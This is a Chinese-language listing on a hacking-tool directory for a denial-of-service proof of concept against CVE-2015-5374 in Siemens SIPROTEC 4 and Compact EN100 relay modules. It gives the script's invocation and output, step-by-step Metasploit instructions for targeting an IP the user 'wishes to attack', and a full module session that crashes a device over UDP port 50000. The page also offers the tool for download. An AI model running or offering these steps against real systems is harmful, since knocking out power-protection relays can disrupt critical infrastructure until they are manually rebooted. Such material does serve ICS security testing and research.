Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2015-5374-DoS-PoC — 针对CVE-2015-5374的拒绝服务漏洞利用,通过向端口50000发送构造的UDP数据包,攻击西门子SIPROTEC 4和Compact EN100以太网模块,包含Metasploit辅助模块。 | Kitploit
工具/GitHubGitHub/can/cve-2015-5374-dos-poc
漏洞利用框架漏洞分析漏洞利用SCADA/ICS安全渗透测试
GitHubcan/cve-2015-5374-dos-poc

CVE-2015-5374-DoS-PoC

针对CVE-2015-5374的拒绝服务漏洞利用,通过向端口50000发送构造的UDP数据包,攻击西门子SIPROTEC 4和Compact EN100以太网模块,包含Metasploit辅助模块。

查看仓库
3398年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2015-5374 Siemens SIPROTEC 4 和 SIPROTEC Compact EN100 以太网模块 < V4.25 - 拒绝服务

此代码向端口 50000/UDP 发送特制数据包,可能导致受影响的设备发生拒绝服务。需要手动重启才能将设备恢复到服务状态。此漏洞已分配 CVE-2015-5374,CVSS v2 基础评分为 7.8。

root@kitploit:~
can@exploit:~/siprotec_dos_poc$ python Siemens_SIPROTEC_DoS.py <target>
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Sending packet to <target> ...
Done, say goodbye!

Metasploit 模块

该模块向端口 50000/UDP 发送特制数据包,可能导致受影响的设备发生拒绝服务。需要手动重启才能将设备恢复到服务状态。

验证步骤

  1. 执行:use auxiliary/dos/scada/siemens_siprotec4
  2. 执行:set RHOST [Target IP],将 [Target IP] 替换为您希望攻击的 IP 地址。
  3. 执行:run
  4. 如果 Siemens SIPROTEC 4 或 Compact 设备运行的是易受攻击的版本之一,它将立即崩溃。

选项

set RHOST [Target IP],set RPORT [Target Port (Default 50000)]。

场景

root@kitploit:~
msf auxiliary(siemens_siprotec4) > info

     Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service 
   Module: auxiliary/dos/scada/siemens_siprotec4
  License: Metasploit Framework License (BSD)
     Rank: Normal

Provided by:
M. Can Kurnaz

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  50000            yes       The target port (UDP)

Description:
This module sends a specially crafted packet to port 50000/UDP 
causing a denial of service of the affected (Siemens SIPROTEC 4 and 
SIPROTEC Compact) devices. A manual reboot is required to return the 
device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
have been assigned to this vulnerability.

References:
https://www.exploit-db.com/exploits/44103/
https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

msf auxiliary(siemens_siprotec4) > show options 

Module options (auxiliary/dos/scada/siemens_siprotec4):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 RHOST                   yes       The target address
 RPORT  50000            yes       The target port (UDP)

msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
rhost => 192.168.1.61
msf auxiliary(siemens_siprotec4) > run

[*] Sending DoS packet ... 
[*] Auxiliary module execution completed
msf auxiliary(siemens_siprotec4) > 
下载工具